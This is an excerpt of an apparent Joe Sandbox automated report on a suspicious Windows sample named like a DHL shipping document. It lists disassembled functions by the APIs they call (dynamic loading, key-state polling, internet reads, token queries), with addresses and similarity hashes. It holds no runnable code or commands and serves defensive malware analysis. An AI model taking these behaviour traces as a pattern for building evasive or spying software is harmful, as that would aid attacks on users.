                                                                                            • LoadLibraryW.KERNEL32(?,00000000,?), ref: 008A8F40
                                                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 008A8FD0
                                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 008A8FEC
                                                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 008A9032
                                                                                            • FreeLibrary.KERNEL32(00000000), ref: 008A9052
                                                                                              • Part of subcall function 0083F6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,00891043,?,7529E610), ref: 0083F6E6
                                                                                              • Part of subcall function 0083F6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,0087FA64,00000000,00000000,?,?,00891043,?,7529E610,?,0087FA64), ref: 0083F70D
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
                                                                                            • String ID:
                                                                                            • API String ID: 666041331-0
                                                                                            • Opcode ID: 473a2e50c12b673df95c8f1c91db358712c6eb6793607114dd2584a5b141517c
                                                                                            • Instruction ID: 96330b1129c866658c4c98c1f895bc833ce90d57fa5a2f2365f7c455b5b5665b
                                                                                            • Opcode Fuzzy Hash: 473a2e50c12b673df95c8f1c91db358712c6eb6793607114dd2584a5b141517c
                                                                                            • Instruction Fuzzy Hash: FC512634605615DFDB11DF58C4848A9BBF1FF4A314B0980A8E84AEB762DB31ED86CB91
                                                                                            APIs
                                                                                            • SetWindowLongW.USER32(00000002,000000F0,?), ref: 008B6C33
                                                                                            • SetWindowLongW.USER32(?,000000EC,?), ref: 008B6C4A
                                                                                            • SendMessageW.USER32(00000002,00001036,00000000,?), ref: 008B6C73
                                                                                            • ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,0089AB79,00000000,00000000), ref: 008B6C98
                                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 008B6CC7
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$Long$MessageSendShow
                                                                                            • String ID:
                                                                                            • API String ID: 3688381893-0
                                                                                            • Opcode ID: bc34d0a75cd2b592dd4a85a5bd33c01afa20ec8762045f84d5c2852db6015299
                                                                                            • Instruction ID: 9d4ea9361c48876c3f21aa04c1742d02cdea7c1b1d59bc889e3b62f2dea16832
                                                                                            • Opcode Fuzzy Hash: bc34d0a75cd2b592dd4a85a5bd33c01afa20ec8762045f84d5c2852db6015299
                                                                                            • Instruction Fuzzy Hash: C641A235A04108AFDB24CF28CC68FE97FA5FB09360F140268E995E73A0E375AD61CA50
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: _free
                                                                                            • String ID:
                                                                                            • API String ID: 269201875-0
                                                                                            • Opcode ID: 11557e36bafb9c7db61791e87387cb8ec1e31a0ec38ad1e9cc5ab3a172d228f0
                                                                                            • Instruction ID: 30f3dfafd188ba289d1245c0d72946a47ea55e218dffabf03321b8cd3100445a
                                                                                            • Opcode Fuzzy Hash: 11557e36bafb9c7db61791e87387cb8ec1e31a0ec38ad1e9cc5ab3a172d228f0
                                                                                            • Instruction Fuzzy Hash: 5B41D132E006049FCB24DF78C981A5EB7A5FF8A315F1545A8EA15EB392DB31AD05CB81
                                                                                            APIs
                                                                                            • GetCursorPos.USER32(?), ref: 00839141
                                                                                            • ScreenToClient.USER32(00000000,?), ref: 0083915E
                                                                                            • GetAsyncKeyState.USER32(00000001), ref: 00839183
                                                                                            • GetAsyncKeyState.USER32(00000002), ref: 0083919D
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: AsyncState$ClientCursorScreen
                                                                                            • String ID:
                                                                                            • API String ID: 4210589936-0
                                                                                            • Opcode ID: cf087b5d10f8414c314743925f62db225b70b42662a32622ffd6a283d8705db6
                                                                                            • Instruction ID: 3b20dd26bf348f8a1b39b0f64fc933238eeaf21dc279ded487b7e22565ca0b29
                                                                                            • Opcode Fuzzy Hash: cf087b5d10f8414c314743925f62db225b70b42662a32622ffd6a283d8705db6
                                                                                            • Instruction Fuzzy Hash: 5C416F31A0860AFBDF159F68C844BEEB774FB45324F208229E469E3294C774A950CFA1
                                                                                            APIs
                                                                                            • GetInputState.USER32 ref: 008938CB
                                                                                            • TranslateAcceleratorW.USER32(?,00000000,?), ref: 00893922
                                                                                            • TranslateMessage.USER32(?), ref: 0089394B
                                                                                            • DispatchMessageW.USER32(?), ref: 00893955
                                                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00893966
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: Message$Translate$AcceleratorDispatchInputPeekState
                                                                                            • String ID:
                                                                                            • API String ID: 2256411358-0
                                                                                            • Opcode ID: d1e6fec1705dd191bb508543173caeb0e81758fa5b0774a51d4ccec6b10dcda5
                                                                                            • Instruction ID: 879032ed9b21ec134d810e24297fff0de603682d75e5ca583f297f23fac7d469
                                                                                            • Opcode Fuzzy Hash: d1e6fec1705dd191bb508543173caeb0e81758fa5b0774a51d4ccec6b10dcda5
                                                                                            • Instruction Fuzzy Hash: 3A31DF70904346DEEF35EB359808FB67FA8FB16304F0C0569E466D25A0E3B4AA85CB21
                                                                                            APIs
                                                                                            • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,00000000,?,?,?,0089C21E,00000000), ref: 0089CF38
                                                                                            • InternetReadFile.WININET(?,00000000,?,?), ref: 0089CF6F
                                                                                            • GetLastError.KERNEL32(?,00000000,?,?,?,0089C21E,00000000), ref: 0089CFB4
                                                                                            • SetEvent.KERNEL32(?,?,00000000,?,?,?,0089C21E,00000000), ref: 0089CFC8
                                                                                            • SetEvent.KERNEL32(?,?,00000000,?,?,?,0089C21E,00000000), ref: 0089CFF2
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: EventInternet$AvailableDataErrorFileLastQueryRead
                                                                                            • String ID:
                                                                                            • API String ID: 3191363074-0
                                                                                            • Opcode ID: ca4551f5eb7ab401fb46da357c7fbf2153569549f69562205863acb368d49bbc
                                                                                            • Instruction ID: 1b203483d415b8898bc978f1dcfc54f04ed5bfd19af9bbe6e4e319685998011d
                                                                                            • Opcode Fuzzy Hash: ca4551f5eb7ab401fb46da357c7fbf2153569549f69562205863acb368d49bbc
                                                                                            • Instruction Fuzzy Hash: 7A315E71900609EFDF20EFA9C8849ABBBF9FF54354B14442EF506D2141DB71AE40DBA0
                                                                                            APIs
                                                                                            • GetWindowRect.USER32(?,?), ref: 00881915
                                                                                            • PostMessageW.USER32(00000001,00000201,00000001), ref: 008819C1
                                                                                            • Sleep.KERNEL32(00000000,?,?,?), ref: 008819C9
                                                                                            • PostMessageW.USER32(00000001,00000202,00000000), ref: 008819DA
                                                                                            • Sleep.KERNEL32(00000000,?,?,?,?), ref: 008819E2
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessagePostSleep$RectWindow
                                                                                            • String ID:
                                                                                            • API String ID: 3382505437-0
                                                                                            • Opcode ID: a3ffc4659fa722e15322113bbca8073d29c20e037b001088b4e3656e87fc61ca
                                                                                            • Instruction ID: 3d15048e061d90103fa53febdb88d8b77f3b1c0c4b182f1cd849ea28f0cbabc5
                                                                                            • Opcode Fuzzy Hash: a3ffc4659fa722e15322113bbca8073d29c20e037b001088b4e3656e87fc61ca
                                                                                            • Instruction Fuzzy Hash: 44319C71A00219EFCB00DFA8CD9DAAE3BB9FB05315F104229F961E72D1CBB09945CB90
                                                                                            APIs
                                                                                            • SendMessageW.USER32(?,00001053,000000FF,?), ref: 008B5745
                                                                                            • SendMessageW.USER32(?,00001074,?,00000001), ref: 008B579D
                                                                                            • _wcslen.LIBCMT ref: 008B57AF
                                                                                            • _wcslen.LIBCMT ref: 008B57BA
                                                                                            • SendMessageW.USER32(?,00001002,00000000,?), ref: 008B5816
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSend$_wcslen
                                                                                            • String ID:
                                                                                            • API String ID: 763830540-0
                                                                                            • Opcode ID: 6fb2071cee7a7a99386e6b862d88ffdcb9b398a1dfc0e1860fa7eb6b08b8aa7c
                                                                                            • Instruction ID: 7bf8912399bd7df3bd2bd82030e4f658bfba7d2f47ca06f55f09be7c01a37462
                                                                                            • Opcode Fuzzy Hash: 6fb2071cee7a7a99386e6b862d88ffdcb9b398a1dfc0e1860fa7eb6b08b8aa7c
                                                                                            • Instruction Fuzzy Hash: 4A218271904618EADB209FA4DC85BEE7BB8FF14724F108216F929EB2C0D7709985CF54
                                                                                            APIs
                                                                                            • GetSysColor.USER32(00000008), ref: 008398CC
                                                                                            • SetTextColor.GDI32(?,?), ref: 008398D6
                                                                                            • SetBkMode.GDI32(?,00000001), ref: 008398E9
                                                                                            • GetStockObject.GDI32(00000005), ref: 008398F1
                                                                                            • GetWindowLongW.USER32(?,000000EB), ref: 00839952
                                                                                            Similarity
                                                                                            • API ID: Color$LongModeObjectStockTextWindow
                                                                                            • String ID:
                                                                                            • API String ID: 1860813098-0
                                                                                            • Opcode ID: 803251941eca461a9ea5a9bcd9e6d2db499c38c74217f2162120613d3ad88da0
                                                                                            • Instruction ID: 766b5e580df8492cb945f4c6f7a34f0b8c1c94bb73f94cda91594386c656db22
                                                                                            • Opcode Fuzzy Hash: 803251941eca461a9ea5a9bcd9e6d2db499c38c74217f2162120613d3ad88da0
                                                                                            • Instruction Fuzzy Hash: C33126325492909FC7128F38EC54AA53FA0FF97331B18029DE9D2CA1B1C7724952DB90
                                                                                            APIs
                                                                                            • IsWindow.USER32(00000000), ref: 008A0951
                                                                                            • GetForegroundWindow.USER32 ref: 008A0968
                                                                                            • GetDC.USER32(00000000), ref: 008A09A4
                                                                                            • GetPixel.GDI32(00000000,?,00000003), ref: 008A09B0
                                                                                            • ReleaseDC.USER32(00000000,00000003), ref: 008A09E8
                                                                                            Similarity
                                                                                            • API ID: Window$ForegroundPixelRelease
                                                                                            • String ID:
                                                                                            • API String ID: 4156661090-0
                                                                                            • Opcode ID: 936286eb0ce197282f63c4696be81326685f778e08059a49b592ff7cb5ce0fb3
                                                                                            • Instruction ID: 0fd7e2253a1cc7e93a698c973f1f442cb38ece964e91b618ebe91014356730cf
                                                                                            • Opcode Fuzzy Hash: 936286eb0ce197282f63c4696be81326685f778e08059a49b592ff7cb5ce0fb3
                                                                                            • Instruction Fuzzy Hash: 39218135A00214AFDB04EF69D989AAEBBE9FF49700F04816CF84AD7752CB70AC44CB51
                                                                                            APIs
                                                                                            • GetEnvironmentStringsW.KERNEL32 ref: 0085CDC6
                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0085CDE9
                                                                                              • Part of subcall function 00853820: RtlAllocateHeap.NTDLL(00000000,?,008F1444,?,0083FDF5,?,?,0082A976,00000010,008F1440,008213FC,?,008213C6,?,00821129), ref: 00853852
                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0085CE0F
                                                                                            • _free.LIBCMT ref: 0085CE22
                                                                                            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0085CE31
                                                                                            Similarity
                                                                                            • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                            • String ID:
                                                                                            • API String ID: 336800556-0
                                                                                            • Opcode ID: 0986a84061d46e9840685d8c934ad018370f8d3da2f641c1f7163e1c8b386e6b
                                                                                            • Instruction ID: df70a40b2259317737924fc7fc79c24567688bb68dbe3b96d6a10bb10900b213
                                                                                            • Opcode Fuzzy Hash: 0986a84061d46e9840685d8c934ad018370f8d3da2f641c1f7163e1c8b386e6b
                                                                                            • Instruction Fuzzy Hash: C6018F726023157F27211ABAAC8AD7B7E6DFEC6BA23150229FD05D7201EB618D0589B1
                                                                                            APIs
                                                                                            • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00839693
                                                                                            • SelectObject.GDI32(?,00000000), ref: 008396A2
                                                                                            • BeginPath.GDI32(?), ref: 008396B9
                                                                                            • SelectObject.GDI32(?,00000000), ref: 008396E2
                                                                                            Similarity
                                                                                            • API ID: ObjectSelect$BeginCreatePath
                                                                                            • String ID:
                                                                                            • API String ID: 3225163088-0
                                                                                            • Opcode ID: 7f480d73f955e7f8920197fdfbb96b1b418c2701304990c27b6cd1beec10e8eb
                                                                                            • Instruction ID: dfa282de2b8a6d481c05145f99243ca51ffa1652a24858d3705a2ef21b626a79
                                                                                            • Opcode Fuzzy Hash: 7f480d73f955e7f8920197fdfbb96b1b418c2701304990c27b6cd1beec10e8eb
                                                                                            • Instruction Fuzzy Hash: 6B216D30902205EBDF119F29DC19BB93FA8FBA0315F504216F450E61A0E3F09892CFD0
                                                                                            APIs
                                                                                            Similarity
                                                                                            • API ID: _memcmp
                                                                                            • String ID:
                                                                                            • API String ID: 2931989736-0
                                                                                            • Opcode ID: 650b19fb6b37e6bbcd160c4f4bc4589da55db442ac2cd27f854bc9c4afa49927
                                                                                            • Instruction ID: ae0a61a46456851af9c992ef25986c67b631d6dbddc40fc62ebcc6ce1e1af087
                                                                                            • Opcode Fuzzy Hash: 650b19fb6b37e6bbcd160c4f4bc4589da55db442ac2cd27f854bc9c4afa49927
                                                                                            • Instruction Fuzzy Hash: 2501927564161EBAE60875149D82EFB635CFB213A8F40C020FE14DA342F768ED5083A5
                                                                                            APIs
                                                                                            • GetLastError.KERNEL32(?,?,?,0084F2DE,00853863,008F1444,?,0083FDF5,?,?,0082A976,00000010,008F1440,008213FC,?,008213C6), ref: 00852DFD
                                                                                            • _free.LIBCMT ref: 00852E32
                                                                                            • _free.LIBCMT ref: 00852E59
                                                                                            • SetLastError.KERNEL32(00000000,00821129), ref: 00852E66
                                                                                            • SetLastError.KERNEL32(00000000,00821129), ref: 00852E6F
                                                                                            Similarity
                                                                                            • API ID: ErrorLast$_free
                                                                                            • String ID:
                                                                                            • API String ID: 3170660625-0
                                                                                            • Opcode ID: 233bbe981ab3dd708f3cb0ad884b9d3442b27f39dca51916671bf57fe70b864e
                                                                                            • Instruction ID: 792b99a0e36df28d18a622b11dc2dc5a9f147a008126897c4054804f9145e736
                                                                                            • Opcode Fuzzy Hash: 233bbe981ab3dd708f3cb0ad884b9d3442b27f39dca51916671bf57fe70b864e
                                                                                            • Instruction Fuzzy Hash: AC01F432645A006BC71267786C87D2B2B99FBD73BBB644129FC21E2293EF349C0D4122
                                                                                            APIs
                                                                                            • CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,0087FF41,80070057,?,?,?,0088035E), ref: 0088002B
                                                                                            • ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0087FF41,80070057,?,?), ref: 00880046
                                                                                            • lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0087FF41,80070057,?,?), ref: 00880054
                                                                                            • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0087FF41,80070057,?), ref: 00880064
                                                                                            • CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0087FF41,80070057,?,?), ref: 00880070
                                                                                            Similarity
                                                                                            • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                            • String ID:
                                                                                            • API String ID: 3897988419-0
                                                                                            • Opcode ID: 9738b11108540665fcf630e27257e5b92508977d6058f45041f80eb65dad2fb9
                                                                                            • Instruction ID: 70ddca12f2b1ae9d06bf698d22c8f9cf9b2dc78336e8a618285edf5f84df9d56
                                                                                            • Opcode Fuzzy Hash: 9738b11108540665fcf630e27257e5b92508977d6058f45041f80eb65dad2fb9
                                                                                            • Instruction Fuzzy Hash: 6C01AD72600605BFDB51AF68DC04BAA7BEDFF48792F144224F905D6210E771DD449BA0
                                                                                            APIs
                                                                                            • QueryPerformanceCounter.KERNEL32(?), ref: 0088E997
                                                                                            • QueryPerformanceFrequency.KERNEL32(?), ref: 0088E9A5
                                                                                            • Sleep.KERNEL32(00000000), ref: 0088E9AD
                                                                                            • QueryPerformanceCounter.KERNEL32(?), ref: 0088E9B7
                                                                                            • Sleep.KERNEL32 ref: 0088E9F3
                                                                                            Similarity
                                                                                            • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                            • String ID:
                                                                                            • API String ID: 2833360925-0
                                                                                            • Opcode ID: 64ec1cba3fc2a79fae91ffd961d579e956a29a5940e0678c35ca348444a62ae3
                                                                                            • Instruction ID: 4523e8ece75ae5b28b8e56fd0c50932bc91ca3c42e5c49d379acb5cffcf54b86
                                                                                            • Opcode Fuzzy Hash: 64ec1cba3fc2a79fae91ffd961d579e956a29a5940e0678c35ca348444a62ae3
                                                                                            • Instruction Fuzzy Hash: 5C011331D01A2DDBCF00ABE9ED59AEDBF78FF09701F010656E942F2241CB7096548BA2
                                                                                            APIs
                                                                                            • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00881114
                                                                                            • GetLastError.KERNEL32(?,00000000,00000000,?,?,00880B9B,?,?,?), ref: 00881120
                                                                                            • GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00880B9B,?,?,?), ref: 0088112F
                                                                                            • HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00880B9B,?,?,?), ref: 00881136
                                                                                            • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0088114D
                                                                                            Similarity
                                                                                            • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                                            • String ID:
                                                                                            • API String ID: 842720411-0
                                                                                            • Opcode ID: 77d93323bcccbcd0ae4ea8998700ffcdcff9f2c21cb50a2c769fcb0d577862e1
                                                                                            • Instruction ID: 1163c47039a680696f790f43a84d8fd893b1e2889685ff2baf44208945238af7
                                                                                            • Opcode Fuzzy Hash: 77d93323bcccbcd0ae4ea8998700ffcdcff9f2c21cb50a2c769fcb0d577862e1
                                                                                            • Instruction Fuzzy Hash: 4F011979200605BFDB115FA9DC4DAAA3F6EFF893A0B204519FA45D7360DE31DC019B60
                                                                                            APIs
                                                                                            • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00880FCA
                                                                                            • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00880FD6
                                                                                            • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00880FE5
                                                                                            • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00880FEC
                                                                                            • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00881002
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                            • String ID:
                                                                                            • API String ID: 44706859-0
                                                                                            • Opcode ID: cdb968fd5db020faf1e1946b2909336bc41130622b421397fcbbd52eb01b5f6c
                                                                                            • Instruction ID: bfa6a92f5dddb742dd2486d0f0e2b6575dabc34fd1293215f6dd263530dd6cde
                                                                                            • Opcode Fuzzy Hash: cdb968fd5db020faf1e1946b2909336bc41130622b421397fcbbd52eb01b5f6c
                                                                                            • Instruction Fuzzy Hash: FCF04975200701ABDB216FA89C4DF563FADFF89B62F104525FA45D6251CA70DC418A60
                                                                                            APIs
                                                                                            • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0088102A
                                                                                            • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00881036
                                                                                            • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00881045
                                                                                            • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 0088104C
                                                                                            • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00881062
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                            • String ID:
                                                                                            • API String ID: 44706859-0
                                                                                            • Opcode ID: 25a9e0236f006b216d79791a4665e3420a59c56c864629389e5530fc4d8f7395
                                                                                            • Instruction ID: b2b94eaa05c041626392540b28a4ab323bffa82a78c701c20e63bb859be3d550
                                                                                            • Opcode Fuzzy Hash: 25a9e0236f006b216d79791a4665e3420a59c56c864629389e5530fc4d8f7395
                                                                                            • Instruction Fuzzy Hash: 49F04975200701ABDB21AFA8EC4DF573FADFF89761F100525FA45D6250CA70E8418A60
                                                                                            APIs
                                                                                            • CloseHandle.KERNEL32(?,?,?,?,0089017D,?,008932FC,?,00000001,00862592,?), ref: 00890324
                                                                                            • CloseHandle.KERNEL32(?,?,?,?,0089017D,?,008932FC,?,00000001,00862592,?), ref: 00890331
                                                                                            • CloseHandle.KERNEL32(?,?,?,?,0089017D,?,008932FC,?,00000001,00862592,?), ref: 0089033E
                                                                                            • CloseHandle.KERNEL32(?,?,?,?,0089017D,?,008932FC,?,00000001,00862592,?), ref: 0089034B
                                                                                            • CloseHandle.KERNEL32(?,?,?,?,0089017D,?,008932FC,?,00000001,00862592,?), ref: 00890358
                                                                                            • CloseHandle.KERNEL32(?,?,?,?,0089017D,?,008932FC,?,00000001,00862592,?), ref: 00890365
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
